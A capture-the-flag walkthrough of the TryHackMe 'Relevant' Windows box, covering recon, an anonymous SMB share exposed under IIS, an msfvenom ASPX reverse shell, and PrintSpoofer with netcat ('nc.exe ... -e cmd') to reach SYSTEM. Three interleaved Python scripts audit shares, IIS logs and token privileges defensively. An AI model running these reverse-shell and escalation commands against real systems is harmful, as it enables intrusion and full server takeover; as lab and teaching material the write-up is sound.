TryHackMe: Relevant — Walkthrough

Introduction

This article walks you through the Relevant box, created by The Mayor and hosted on TryHackMe. Anyone with access to TryHackMe can try to pwn this Windows box; it is an intermediate and fun one. The creator of the box wants all practitioners to approach it as a real-life penetration test. Hope you enjoy reading the walkthrough!

Reconnaissance

First of all, we start the box from the Relevant room page.

Starting Relevant

After waiting a while, we are given the IP address of the box, so we scan it with Nmap.

Scanning

We scan the IP for all open ports by typing the following command in our terminal. -p- tells nmap to scan all 65535 ports rather than only its default list.

nmap -p- 10.10.x.x

After waiting a while, we get our results, as shown below:

Nmap Port Scanning

From the open ports found by nmap, we understand that it is a Windows box. To gather more information on those ports, we add some more arguments and list the open ports explicitly. -sV probes for the service versions of the applications on the open ports, and -sC runs the default scripts against those services to check for known issues.

nmap -p 80,135,139,445,3389,49663,49667,49669 10.10.x.x -sV -sC

Shortly after, we get our results with more details about the open ports. We decide to start enumeration on the SMB ports and then continue with the other ports, since there are two HTTP servers.

Nmap Specified Port Scanning

Enumeration

We list the SMB shares on the target box as follows and get some results.

smbclient -L 10.10.x.x

SMB Enumeration

We discover a disk share on the SMB server called nt4wrksv, and we connect to it to enumerate it further.

smbclient \\\\10.10.x.x\\nt4wrksv

SMB Connection

We are able to connect to the share without credentials. Now we enumerate it to see whether there is anything useful.

SMB Enumeration for Useful Files

We come across a passwords.txt file, which may give us credentials to RDP into the box or to log in to the HTTP servers. We download the file and read it.

Decoding Base64 Encoded Strings

We see that it contains two strings, both base64 encoded, so we decode them and get two usernames, each with its password.

Now we try to connect to the target box with psexec so that we can execute commands remotely.

Connecting through Psexec

We get an error when using the first set of credentials found on the SMB server.

Connecting through Psexec on Other User Found

We try the other credentials and still cannot authenticate to the server.

We also try to RDP into the box, since port 3389 is open, but the credentials do not work for RDP either.

Now we enumerate further on the HTTP servers we found during information gathering.

HTTP Enumeration

We check the HTTP server on port 80 and try to brute-force directories with gobuster; however, there is nothing of use for us. So we move on to the other HTTP server on port 49663 to see whether there is something there that gets us a low-privileged shell on the box.

HTTP Enumeration on Port 49663

We see that it is again an IIS server, and we brute-force it for directory discovery with gobuster. The arguments tell gobuster to show only results with 200 and 301 status codes (this filter sometimes does not work properly), to suppress errors, and to use 50 threads to speed things up.

gobuster dir -u http://10.10.x.x:49663 -w directory-list-2.3-medium.txt -s '200,301' --no-error -t 50

Directory Bruteforcing

We discover an interesting directory, nt4wrksv, the same name as the share we saw on the SMB server. We should enumerate it carefully, since it may be the path to a low shell on the system.

Checking Directory Found via Gobuster

We append it to the URL and see nothing, so we add passwords.txt to the end of the URL: it contains the base64 strings, and if they appear in the browser, the web directory is backed by the SMB share. That means we can upload a reverse shell to the SMB share and request it over HTTP to execute it.
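The condition this step relies on, a share that is writable without credentials and whose folder also sits under an IIS site's physical path, is something a defender can check for in an inventory. The following is an added example for this write-up, not code from the box or its author; the share and site entries are constructed sample data, not output from the target, and `find_web_exposed_shares` and `flag_risky_files` are names chosen here.

```python
"""Audit check: flag SMB shares whose folder lies inside an IIS site's physical
path, so that anything dropped on the share is served (and, for scripts,
executed) by the web server.

Added example for this write-up, not code from the box or its author. The share
and site entries below are constructed sample inventory data, not target output.
"""
from pathlib import PureWindowsPath

# Extensions IIS hands to a script engine rather than serving as static content.
SERVER_SIDE_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}
# Native binaries are not run by IIS, but their presence in a web root deserves a look.
BINARY_EXTENSIONS = {".exe", ".dll"}

# Constructed sample: what an inventory script might gather from `net share`
# and the IIS site configuration on one host. Values are illustrative only.
SAMPLE_SHARES = [
    {"name": "nt4wrksv", "path": r"C:\inetpub\wwwroot\nt4wrksv", "anonymous_write": True},
    {"name": "ADMIN$", "path": r"C:\Windows", "anonymous_write": False},
    {"name": "Logs", "path": r"D:\Logs", "anonymous_write": True},
]
SAMPLE_SITES = [
    {"site": "Default Web Site", "physical_path": r"C:\inetpub\wwwroot"},
]


def is_under(child: str, parent: str) -> bool:
    """True when `child` equals `parent` or lies beneath it.
    PureWindowsPath compares case-insensitively, matching NTFS semantics."""
    c, p = PureWindowsPath(child), PureWindowsPath(parent)
    return c == p or p in c.parents


def find_web_exposed_shares(shares, sites):
    """Return one finding per share whose folder is inside an IIS site's physical path.
    Severity is 'high' when the share is writable without credentials, 'info' otherwise."""
    findings = []
    for share in shares:
        for site in sites:
            if not is_under(share["path"], site["physical_path"]):
                continue
            site_depth = len(PureWindowsPath(site["physical_path"]).parts)
            rel_parts = PureWindowsPath(share["path"]).parts[site_depth:]
            findings.append({
                "share": share["name"],
                "site": site["site"],
                "url_path": "/" + "/".join(rel_parts),  # "/" when the share is the site root
                "severity": "high" if share["anonymous_write"] else "info",
            })
    return findings


def flag_risky_files(listing):
    """Given file names from a share listing, return those a web server would execute
    or that are native binaries, preserving listing order."""
    risky = []
    for name in listing:
        ext = PureWindowsPath(name).suffix.lower()
        if ext in SERVER_SIDE_EXTENSIONS or ext in BINARY_EXTENSIONS:
            risky.append(name)
    return risky


if __name__ == "__main__":
    for f in find_web_exposed_shares(SAMPLE_SHARES, SAMPLE_SITES):
        print(f"[{f['severity']}] share {f['share']} is served by '{f['site']}' at {f['url_path']}")
    # Constructed listing of the kind of files seen on the share in this walkthrough.
    print("risky files:", flag_risky_files(["passwords.txt", "relevant.aspx", "nc.exe"]))
```

The fix on the defensive side is to keep share folders out of any web root (or make the share read-only for unauthenticated users), and to alert when server-side script files appear in a directory that is only meant to hold static content.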

Checking Password.txt

As can be seen, we are now ready to exploit the server.

Exploitation

We create a reverse shell as an .aspx file so that the IIS server will execute it, using msfvenom as follows:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.x.x.x LPORT=443 -f aspx > relevant.aspx

Creating a Reverse Shell with Msfvenom

We specify a 64-bit Windows payload that connects back to our local host on the port we defined, and we output it in aspx format.

Uploading Reverse Shell

Then we upload our reverse shell to the SMB share.

Setting up a Netcat Listener

We set up a netcat listener in our terminal to catch the reverse connection.

Curling Reverse Shell to Execute

Now we curl the URL of our reverse shell on the server to execute it.
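From the server side, the curl request above shows up as a single line in the IIS access log: a GET for a server-side script under the share-backed directory. The following added example (not code from the box or its author) parses W3C extended log lines and flags that pattern; the log lines are constructed to mirror the walkthrough's placeholders (10.10.x.x for the target, 10.x.x.x for the attacking host) and are not real IIS output, and the prefix list and function names are assumptions made here.

```python
"""Detection over IIS W3C access logs: find requests that fetch a server-side
script from a directory whose folder is also exposed as a writable share.

Added example for this write-up, not code from the box or its author. The log
lines are constructed to match the walkthrough's placeholder addresses.
"""

SERVER_SIDE_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx")
# URL prefixes whose physical folder is also a writable share (constructed list).
SHARE_BACKED_PREFIXES = ("/nt4wrksv/",)

# Constructed sample log in the W3C extended format IIS writes by default.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus time-taken
2020-07-25 10:01:02 10.10.x.x GET / - 49663 - 10.x.x.x Mozilla/5.0+(X11;+Linux+x86_64) 200 0 15
2020-07-25 10:03:40 10.10.x.x GET /nt4wrksv/passwords.txt - 49663 - 10.x.x.x Mozilla/5.0+(X11;+Linux+x86_64) 200 0 4
2020-07-25 10:09:11 10.10.x.x GET /nt4wrksv/relevant.aspx - 49663 - 10.x.x.x curl/7.68.0 200 0 30012
2020-07-25 10:09:30 10.10.x.x GET /nt4wrksv/ - 49663 - 10.x.x.x curl/7.68.0 403 14 2
"""


def parse_iis_w3c(text: str) -> list:
    """Turn W3C log text into a list of dicts keyed by the names in the #Fields line.
    Lines whose column count does not match the header are skipped rather than
    misaligned; lines before any #Fields directive cannot be interpreted and are dropped."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue
        rows.append(dict(zip(fields, values)))
    return rows


def find_script_requests_in_shares(rows: list, prefixes=SHARE_BACKED_PREFIXES) -> list:
    """Return requests for a server-side script beneath a share-backed directory.
    A 200 here means the server ran the script; a 404 still records the attempt."""
    findings = []
    for r in rows:
        stem = r.get("cs-uri-stem", "").lower()
        if stem.startswith(prefixes) and stem.endswith(SERVER_SIDE_EXTENSIONS):
            findings.append({
                "time": f"{r.get('date', '?')} {r.get('time', '?')}",
                "client": r.get("c-ip", "?"),
                "uri": r["cs-uri-stem"],
                "status": r.get("sc-status", "?"),
                "user_agent": r.get("cs(User-Agent)", "?"),
                "time_taken_ms": r.get("time-taken", "?"),
            })
    return findings


if __name__ == "__main__":
    for hit in find_script_requests_in_shares(parse_iis_w3c(SAMPLE_LOG)):
        print(f"{hit['time']} {hit['client']} -> {hit['uri']} {hit['status']} "
              f"ua={hit['user_agent']} took={hit['time_taken_ms']}ms")
```

A long time-taken value on such a request is itself a useful secondary signal: a script that holds a connection open behaves very differently from a page that returns immediately.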

Getting a Low Shell on the Target

As can be seen, we now have a low shell on the target box, and we go and get the user hash.

Low Shell User Hash

Privilege Escalation

We enumerate the machine to find weak services and files on the server.

Privilege Escalation Enumeration

After enumerating the box for a while, we discover that SeImpersonatePrivilege is enabled for our current user, which means we can abuse it to gain full control of the server.
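Spotting this privilege is exactly what a defender's audit of service accounts should do before an attacker does. The following added example (not code from the box or its author) parses `whoami /priv` output and reports the token privileges that allow acting as other users; the sample output is constructed to look like that of an IIS application-pool identity and is not a capture from the target, and the function names and the HIGH_RISK_PRIVILEGES list are choices made here.

```python
"""Privilege audit: parse `whoami /priv` output and report privileges that let a
process act as another principal, so service accounts holding them can be reviewed.

Added example for this write-up, not code from the box or its author. The sample
output below is constructed, not captured from the target.
"""

# Token privileges that allow acting as another security principal or bypassing
# normal access checks. Holding one of these is effectively administrator-equivalent.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
    "SeCreateTokenPrivilege",
}

# Constructed sample of `whoami /priv` output for a web-server service identity.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(output: str) -> dict:
    """Map privilege name -> state ('Enabled'/'Disabled') from `whoami /priv` output.
    Data rows start after the '=====' separator line; the description column may
    contain spaces, so only the first and last whitespace-separated tokens are used."""
    privs = {}
    in_table = False
    for line in output.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        parts = line.split()
        if not in_table or len(parts) < 2:
            continue
        privs[parts[0]] = parts[-1]
    return privs


def high_risk_held(privs: dict) -> list:
    """Return (name, state) for every high-risk privilege present in the token,
    sorted by name. A 'Disabled' entry still counts: the process can turn it on
    with AdjustTokenPrivileges, so presence in the token is the finding."""
    return sorted((name, state) for name, state in privs.items()
                  if name in HIGH_RISK_PRIVILEGES)


def can_impersonate(privs: dict) -> bool:
    """True when the token holds either of the two privileges that impersonation-based
    escalation techniques (the potato family, PrintSpoofer) depend on."""
    return any(p in privs for p in ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"))


if __name__ == "__main__":
    p = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name, state in high_risk_held(p):
        print(f"{name:32} {state}")
    print("impersonation-capable:", can_impersonate(p))
```

Because IIS application-pool identities hold SeImpersonatePrivilege by design, the practical mitigation is upstream: keep untrusted users from placing executable content in the web root, and treat any shell running as the pool identity as one step from SYSTEM.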

We try two popular potato attacks, but we cannot execute commands with them, since DCOM is disabled on the box, which blocks those attacks, and there are no tokens to impersonate.

In this case, we google and find that SeImpersonatePrivilege can also be abused with a newer exploit called PrintSpoofer. Instead of compiling it ourselves, we look for an already compiled binary (this is not recommended, since prebuilt exploits may have been compiled with malicious additions), and on GitHub we see that the creator of the box has shared a compiled build, so we are good to go.

Uploading PrintSpoofer

After uploading the exploit via the SMB share, we also upload the Windows netcat binary, since we will use it to get a reverse shell as root.

Checking PrintSpoofer

And we upload the Windows netcat binary.

Uploading and Checking Netcat Windows Binary

Now we are ready to escalate our privileges on the server, so we set up another netcat listener in another terminal.

Setting up Another Netcat Listener to Get Another Reverse Shell

With the following command, we run the netcat binary we uploaded to the server through PrintSpoofer to get a reverse shell.

PrintSpoofer.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe 10.x.x.x 443 -e cmd"

Executing Command on the Target Box

After executing the command in the low shell terminal, we check our netcat listener and we have a shell as NT Authority on the system.

Getting Reverse Shell as NT Authority

Now it is time to get the root hash.

Getting Root Shell

Now we have full authority on the box. Enjoy!
